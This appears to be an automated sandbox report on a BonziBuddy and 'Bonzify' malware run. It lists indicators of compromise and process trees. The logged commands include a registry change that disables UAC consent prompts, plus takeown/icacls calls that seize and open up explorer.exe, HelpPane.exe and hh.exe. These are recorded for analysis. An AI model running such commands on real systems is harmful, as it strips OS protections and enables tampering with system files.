Token: SeTakeOwnershipPrivilege	2096	takeown.exe
Token: SeTakeOwnershipPrivilege	3260	takeown.exe
Token: SeTakeOwnershipPrivilege	656	takeown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3472	firefox.exe
3472	firefox.exe
3472	firefox.exe
3472	firefox.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3472	firefox.exe
3472	firefox.exe
3472	firefox.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
2240	AgentSvr.exe
2240	AgentSvr.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe

Suspicious use of SetWindowsHookEx 31 IoCs

pid	Process
3472	firefox.exe
3472	firefox.exe
3472	firefox.exe
3472	firefox.exe
1288	BonziBuddy432.exe
1420	tv_enua.exe
3032	MSAGENT.EXE
5548	AgentSvr.exe
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
1336	firefox.exe
5968	Bonzify.exe
6056	INSTALLER.exe
3316	AgentSvr.exe
4436	INSTALLER.exe
2240	AgentSvr.exe
2152	SearchUI.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe
4272	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 4344 wrote to memory of 3472	4344	firefox.exe	74
PID 3472 wrote to memory of 4696	3472	firefox.exe	75
PID 3472 wrote to memory of 4696	3472	firefox.exe	75
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 4580	3472	firefox.exe	76
PID 3472 wrote to memory of 2820	3472	firefox.exe	77
PID 3472 wrote to memory of 2820	3472	firefox.exe	77
PID 3472 wrote to memory of 2820	3472	firefox.exe	77

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\PFP-240-Glass.png
1⤵
PID:4672

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4344
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.0.1634950994\1157223267" -parentBuildID 20221007134813 -prefsHandle 1688 -prefMapHandle 1680 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a5b1466-8b06-49e9-88a0-5a33787465cc} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 1764 2a97a914b58 gpu
    3⤵
    PID:4696
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.1.1382923048\557645141" -parentBuildID 20221007134813 -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cf69658-91ff-420e-b91d-dd2041d27f5e} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 2108 2a967e72558 socket
    3⤵
    - Checks processor information in registry
    PID:4580
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.2.470346484\1705489681" -childID 1 -isForBrowser -prefsHandle 2800 -prefMapHandle 2776 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ffe092f-0a2e-4a13-a754-3bc90c99f8b0} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 2812 2a97e4faf58 tab
    3⤵
    PID:2820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.3.1089371416\1993314368" -childID 2 -isForBrowser -prefsHandle 3340 -prefMapHandle 3336 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {769ceb18-1623-49f7-8fd6-39d08a4327a4} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 3348 2a967e69358 tab
    3⤵
    PID:4940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.4.773946181\1589652108" -childID 3 -isForBrowser -prefsHandle 3968 -prefMapHandle 2624 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {782f74a0-4fd0-4014-95b5-7757d7da4bf8} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 3980 2a97d5fac58 tab
    3⤵
    PID:2572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.5.700192580\660418773" -childID 4 -isForBrowser -prefsHandle 4796 -prefMapHandle 4792 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a83b8e10-3971-42f0-9ad4-07b8bb947f51} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 4808 2a98081a158 tab
    3⤵
    PID:4084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.6.1925239060\922024201" -childID 5 -isForBrowser -prefsHandle 4980 -prefMapHandle 4984 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1cfa35dd-d967-4874-9d8e-1c2bc0386faf} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 4968 2a980e24258 tab
    3⤵
    PID:488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.7.712507057\1987615981" -childID 6 -isForBrowser -prefsHandle 5168 -prefMapHandle 5172 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c60a43eb-1ec9-4596-8d91-34791dac3121} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 5252 2a980e24858 tab
    3⤵
    PID:4088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.8.1945894457\1292376746" -childID 7 -isForBrowser -prefsHandle 4084 -prefMapHandle 4072 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {909fcd96-4dbb-42bd-b997-95d03d9dbf96} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 4056 2a97fccd858 tab
    3⤵
    PID:4324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.9.1845086167\1971999040" -childID 8 -isForBrowser -prefsHandle 5636 -prefMapHandle 5632 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0797d196-72cb-4a76-afc4-b111b2ca8b2b} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 4804 2a980eb6c58 tab
    3⤵
    PID:4884
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3472.10.914649026\521883238" -childID 9 -isForBrowser -prefsHandle 4924 -prefMapHandle 4908 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1296 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64e318c7-394e-4cf1-b6d7-83189120443d} 3472 "\\.\pipe\gecko-crash-server-pipe.3472" 2612 2a97e5d2258 tab
    3⤵
    PID:348

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2192

C:\Users\Admin\Downloads\Bonzi\BonziBuddy432.exe
"C:\Users\Admin\Downloads\Bonzi\BonziBuddy432.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "
  2⤵
  PID:3556
- - C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE
    MSAGENT.EXE
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:3032
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
      4⤵
      Loads dropped DLL
      Modifies registry class
      PID:5388
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
      4⤵
      Loads dropped DLL
      PID:5432
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5448
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
      4⤵
      Loads dropped DLL
      PID:5476
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
      4⤵
      Loads dropped DLL
      PID:5492
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
      4⤵
      Loads dropped DLL
      PID:5508
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5524
  - - C:\Windows\msagent\AgentSvr.exe
      "C:\Windows\msagent\AgentSvr.exe" /regserver
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5548
  - - C:\Windows\SysWOW64\grpconv.exe
      grpconv.exe -o
      4⤵
      PID:5580
- - C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe
    tv_enua.exe
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:1420
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
      4⤵
      Loads dropped DLL
      PID:4500
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
      4⤵
      Loads dropped DLL
      Modifies registry class
      PID:4272
  - - C:\Windows\SysWOW64\grpconv.exe
      grpconv.exe -o
      4⤵
      PID:2420

C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4380

C:\Windows\msagent\AgentSvr.exe
C:\Windows\msagent\AgentSvr.exe -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5164

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x404
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1344
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.0.135103801\611340145" -parentBuildID 20221007134813 -prefsHandle 1604 -prefMapHandle 1548 -prefsLen 21560 -prefMapSize 233863 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00c170fa-4705-4e94-bd9b-79b6c1253382} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 1684 1d9513fcc58 gpu
    3⤵
    PID:2924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.1.101231338\1287799582" -parentBuildID 20221007134813 -prefsHandle 1992 -prefMapHandle 1988 -prefsLen 21605 -prefMapSize 233863 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {411ef575-935d-4184-8368-2ec7d3763a4a} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 2004 1d951038858 socket
    3⤵
    - Checks processor information in registry
    PID:4324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.2.1122506344\159438845" -childID 1 -isForBrowser -prefsHandle 2696 -prefMapHandle 2688 -prefsLen 22066 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {29bfd999-ad62-462f-905a-a54950b7699d} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 2708 1d95165df58 tab
    3⤵
    PID:648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.3.315109871\1641355201" -childID 2 -isForBrowser -prefsHandle 3388 -prefMapHandle 3384 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9eeacaae-ee8c-4350-b02e-60588de7d711} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 3348 1d9561ae458 tab
    3⤵
    PID:1976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.4.370428550\1760165168" -childID 3 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1248b2a2-fefd-458c-b5d8-e1bc10db38de} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 3660 1d956be8e58 tab
    3⤵
    PID:808
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.5.1662360475\1054805929" -childID 4 -isForBrowser -prefsHandle 4564 -prefMapHandle 4560 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe28aa68-18fe-4ae1-aade-91796f851ccc} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 4572 1d95769b658 tab
    3⤵
    PID:2744
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.6.327723546\1542095862" -childID 5 -isForBrowser -prefsHandle 4800 -prefMapHandle 4796 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {860d7b97-e02c-45e5-ae1c-63c06cebfccb} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 4808 1d95769cb58 tab
    3⤵
    PID:5220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.7.199497746\330665931" -childID 6 -isForBrowser -prefsHandle 4908 -prefMapHandle 4912 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1bcc7f0c-2e8c-4144-833f-4c15512e141e} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 4992 1d957a7ce58 tab
    3⤵
    PID:2888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.8.616017125\1195306806" -childID 7 -isForBrowser -prefsHandle 5452 -prefMapHandle 5424 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a26fc3-c959-4ef9-9705-326968976bb6} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 5464 1d959534958 tab
    3⤵
    PID:1140
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1336.9.1048988781\459501453" -childID 8 -isForBrowser -prefsHandle 5760 -prefMapHandle 5756 -prefsLen 27244 -prefMapSize 233863 -jsInitHandle 1288 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd352882-5ee3-4dcb-b817-931653a42aca} 1336 "\\.\pipe\gecko-crash-server-pipe.1336" 5768 1d953f26358 tab
    3⤵
    PID:2032

C:\Users\Admin\Desktop\Bonzify.exe
"C:\Users\Admin\Desktop\Bonzify.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\KillAgent.bat"
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im AgentSvr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /r /d y /f C:\Windows\MsAgent
    3⤵
    PID:3788
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\MsAgent /c /t /grant "everyone":(f)
    3⤵
    PID:3740
- C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe
  INSTALLER.exe /q
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:6056
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2968
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
    3⤵
    - Loads dropped DLL
    PID:1100
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    PID:3908
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
    3⤵
    - Loads dropped DLL
    PID:4340
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:876
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
    3⤵
    - Loads dropped DLL
    PID:996
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
    3⤵
    - Loads dropped DLL
    PID:920
- - C:\Windows\msagent\AgentSvr.exe
    "C:\Windows\msagent\AgentSvr.exe" /regserver
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3316
- - C:\Windows\SysWOW64\grpconv.exe
    grpconv.exe -o
    3⤵
    PID:2620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\explorer.exe"
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\explorer.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\explorer.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\HelpPane.exe"
  2⤵
  PID:4104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\HelpPane.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\HelpPane.exe" /grant "everyone":(f)
    3⤵
    PID:5172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\hh.exe"
  2⤵
  PID:4000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\hh.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4084
